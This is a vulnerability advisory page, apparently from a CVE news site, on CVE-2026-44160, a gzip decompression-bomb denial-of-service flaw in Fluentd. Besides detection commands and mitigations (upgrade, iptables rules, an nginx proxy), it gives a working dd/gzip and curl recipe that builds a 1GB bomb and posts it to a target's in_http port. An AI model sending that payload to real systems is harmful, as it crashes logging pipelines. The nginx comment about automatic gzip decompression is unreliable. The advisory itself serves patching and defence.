Fluentd, Denial of Service (DoS) via Gzip Decompression Bomb, CVE-2026-44160 (High) -DC-Jul2026-937

Listen to this Post

How CVE-2026-44160 Works

Fluentd is a popular open-source data collector that unifies log collection and consumption across various data sources and outputs. It supports multiple input plugins, including `in_http` and in_forward, which are commonly used to ingest log data over HTTP and TCP respectively. To improve performance and reduce bandwidth consumption, these plugins natively support receiving gzip-compressed payloads.
Prior to version 1.19.3, Fluentd enforced size limits—such as `body_size_limit` (for in_http) and `chunk_size_limit` (for in_forward)—only on the compressed payload as it arrives over the network. This means that if an attacker sends a small compressed file (e.g., a few kilobytes) that decompresses into an enormous amount of data (gigabytes or more), Fluentd will accept the small compressed payload and then attempt to decompress it entirely in memory.
The decompression operation does not check or limit the final uncompressed size. As a result, a single crafted request can cause memory consumption to spike rapidly, leading to an Out-of-Memory (OOM) condition. The operating system’s OOM killer will then terminate the Fluentd process, effectively taking down the entire logging pipeline on that node. Because the attack requires no authentication and can be performed over the network, any Fluentd instance exposed to untrusted networks is at risk.
The vulnerability is classified as a “decompression bomb” (also known as a “zip bomb”) attack, but applied to gzip streams. The core issue is the separation of size enforcement from the actual resource consumption phase—limits are checked before decompression, but the decompression itself is unbounded. This flaw was addressed in Fluentd v1.19.3 by introducing a limit on the decompressed data size, ensuring that expansion cannot exceed a safe threshold. Until then, administrators must rely on network restrictions or reverse proxies to mitigate the risk.

DailyCVE Form:

Platform: ……. Fluentd
Version: …….. <=1.19.2
Vulnerability :…… Gzip decompression bomb
Severity: ……. High (7.5)
date: ………. 2026-06-26

Prediction: 2026-07-15 (estimated)

What Undercode Say

Analytics & Detection

To identify whether your Fluentd instance is vulnerable, check the version:

fluentd --version
or
gem list fluentd

If the version is 1.19.2 or lower, the instance is vulnerable. You can also monitor system logs for OOM killer events:

dmesg | grep -i "out of memory"
journalctl -k | grep -i "oom"

To detect potential exploitation attempts, monitor network traffic on ports `9880` (default for in_http) and `24224` (default for in_forward) for unusually small packets that result in high memory usage:

sudo tcpdump -i any port 9880 or port 24224 -v

Code Snippet – Vulnerable Configuration Example

Example fluentd.conf (vulnerable)

<source>

@type http
port 9880
body_size_limit 10m only limits compressed size
</source>

<source>

@type forward
port 24224
chunk_size_limit 10m only limits compressed size
</source>

Exploit

An attacker can craft a gzip file with a very high compression ratio (e.g., using repeated patterns) and send it as the HTTP body to `in_http` or as a forward packet to in_forward. A small payload of a few kilobytes can expand to hundreds of megabytes or even gigabytes when decompressed.

Example using `curl` to send a compressed bomb:

Create a highly compressible payload (e.g., 1GB of 'A' characters)
dd if=/dev/zero bs=1M count=1024 | tr '\0' 'A' | gzip > bomb.gz
Send to Fluentd's in_http endpoint
curl -X POST -H "Content-Encoding: gzip" --data-binary @bomb.gz http://target:9880/your.tag

Upon receiving this request, Fluentd will decompress `bomb.gz` in memory, consuming ~1GB of RAM (or more, depending on the size) and likely triggering an OOM kill.

Protection

  1. Upgrade to Fluentd v1.19.3 or later – This is the only complete fix. For packaged distributions, upgrade to fluent-package v6.0.4 or higher.
  2. Restrict Network Access – Ensure that ports `9880` and `24224` are only accessible from trusted networks. Use firewalls, security groups, or iptables:
    iptables -A INPUT -p tcp --dport 9880 -s 192.168.0.0/16 -j ACCEPT
    iptables -A INPUT -p tcp --dport 9880 -j DROP
    iptables -A INPUT -p tcp --dport 24224 -s 192.168.0.0/16 -j ACCEPT
    iptables -A INPUT -p tcp --dport 24224 -j DROP
    
  3. Use a Reverse Proxy – Place Nginx or HAProxy in front of Fluentd to handle gzip decompression and enforce limits on both compressed and uncompressed body sizes before forwarding:
    Nginx example
    server {
    listen 80;
    client_max_body_size 10m;
    location / {
    proxy_pass http://fluentd:9880;
    proxy_set_header Host $host;
    Nginx will decompress gzip automatically if we set proxy_request_buffering on
    proxy_request_buffering on;
    client_body_buffer_size 10m;
    }
    }
    

Impact

Denial of Service (Availability) – Successful exploitation results in memory exhaustion, causing the Fluentd process to be killed by the OOM killer. This disrupts all log collection, filtering, and forwarding on the affected node, leading to data loss and gaps in monitoring and observability pipelines. Since Fluentd is often a critical component in logging infrastructures, an outage can affect downstream systems that rely on log data for security monitoring, performance analysis, and troubleshooting.
CVSS Score – 7.5 (High) with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H. The attack is network-based, requires no privileges, and has no user interaction, making it easily exploitable.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top